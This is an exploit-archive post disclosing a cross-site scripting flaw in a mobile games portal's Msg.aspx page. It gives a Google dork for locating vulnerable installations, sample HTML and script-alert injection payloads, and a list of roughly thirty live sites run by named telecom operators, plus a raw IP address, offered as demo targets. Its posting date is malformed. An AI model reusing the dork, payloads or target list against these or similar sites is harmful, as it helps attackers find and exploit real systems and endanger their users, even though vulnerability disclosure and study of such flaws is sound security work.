Gamesclub Mobile Service over WAP/GPRS Cross Site Scripting DOM Based XSS Vulnerability
Posted on 30 November -0001
<HTML><HEAD><TITLE>Gamesclub Mobile Service over WAP/GPRS Cross Site Scripting (DOM Based XSS) Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># Exploit Title : Gamesclub Mobile Service over WAP/GPRS Cross Site Scripting (DOM Based XSS) Vulnerability # Application Name : Gamesclub Mobile Service over WAP/GPRS # Exploit Author : (Revlution Security) # Author Contact : localhost097@gmail.com # Vulnerable Type : Cross Site Scripting # Platform : ASP # Date : 11/6/2016 # Google Dork: inurl:Default.aspx intext:gamesclub inurl:/Arabic/ intext:gamesclub inurl:/html5/ intext:gamesclub # Example: gamesclub.example/html5/Arabic/Msg.aspx?msg=<html>omer was here<html/> gamesclub.example/Arabic/Msg.aspx?msg=<html>omer<html/> gamesclub.example/html5/Msg.aspx?msg=<html>omer<html/> gamesclub.example/Feature/Msg.aspx?msg=<html>omer<html/> gamesclub.example/Portal/Msg.aspx?msg=<html>omer<html/> gamesclub.example/HTML5/Msg.aspx?msg=<html>omer<html/> gamesclub.example/LWP/Msg.aspx?msg= # Demo https://games.vodacom.co.tz/HTML5/Msg.aspx?msg= http://gamesclub.asiacell.com/html5/Arabic/Msg.aspx?msg= http://nadialmarah.com/Arabic/Msg.aspx?msg= http://gamesclub.sa.zain.com/Arabic/Msg.aspx?msg= http://gamesclub.etisalat.ae/Arabic/Msg.aspx?msg= http://gamesworld.mobily.com.sa/arabic/Msg.aspx?msg= http://gamesclub.omantel.om/Arabic/Msg.aspx?msg= http://gamesclub.ae/Arabic/Msg.aspx?msg= http://www.stcgames.com/Arabic/Msg.aspx?msg= http://www.vivagamesclub.com/html5/Html5Arabic/Msg.aspx?msg= http://www.alacarte.ae/Arabic/Msg.aspx?msg= http://www.yallanelaab.com/Arabic/Msg.aspx?msg= http://imagery-store.etisalat.ae/Arabic/Msg.aspx?msg= http://gamesclub.airtellive.mobi/GC/wap/msg.aspx?msg= http://gamesclub.mobi/Feature/Msg.aspx?msg= http://gamesclub.mimicromax.com/Portal/Msg.aspx?msg= http://games.ng.airtellive.com/HTML5/Msg.aspx?msg= http://smart.gamesclub.mobi/html5/Msg.aspx?msg= http://gamex.gamesclub.mobi/html5/Msg.aspx?msg= http://gamesclub.mtnonline.com/HTML5/Msg.aspx?msg= http://k.games.etisalat.com.ng/html5?fca=62160&fdn=<script>alert('omer');</script># http://gamesclub.mtn.co.rw/HTML5/Msg.aspx?msg= http://zamtelgames.co.zm/GL/Msg.aspx?msg= http://52.22.41.84/mtnghana_gc/GL/Msg.aspx?msg= http://games.safaricom.com/NewFeature/Msg.aspx?msg= http://gamesclub.mtnzambia.com/GL/Msg.aspx?msg= http://gamesclub.in/NzGamesClub/Wap/Msg.aspx?msg= http://videostore.ng/GL/Msg.aspx?msg= http://wap.nazara.com/Portal/Msg.aspx?msg= http://m.djuzz.com/Portal/Msg.aspx?msg= http://ru.mimicromax.com/LWP/Msg.aspx?msg= http://bd.mimicromax.com/LWP/Msg.aspx?msg= </BODY></HTML>